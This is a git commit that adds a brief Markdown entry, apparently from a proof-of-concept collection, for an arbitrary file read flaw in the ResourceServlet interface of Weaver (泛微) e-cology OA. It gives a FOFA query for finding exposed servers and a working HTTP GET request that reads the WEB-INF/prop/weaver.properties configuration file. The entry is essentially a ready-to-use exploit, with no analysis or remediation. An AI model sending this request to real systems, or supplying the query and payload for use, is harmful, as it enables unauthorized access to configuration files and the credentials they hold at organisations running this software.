Create 泛微-OA系统ResourceServlet接口任意文件读取漏洞.md

2024-05-14 18:48:04 +08:00 · 2024-05-14 18:48:04 +08:00 · 1ee81601cb
commit 1ee81601cb
parent 2a725ffc14
1 changed files with 11 additions and 0 deletions
--- a/泛微-OA系统ResourceServlet接口任意文件读取漏洞.md
+++ b/泛微-OA系统ResourceServlet接口任意文件读取漏洞.md
@ -0,0 +1,11 @@
+## 泛微-OA系统ResourceServlet接口任意文件读取漏洞
+
+## fofa
+```
+app="泛微-OA(e-cology)"
+```
+
+## poc
+```
+GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties HTTP/1.1
+```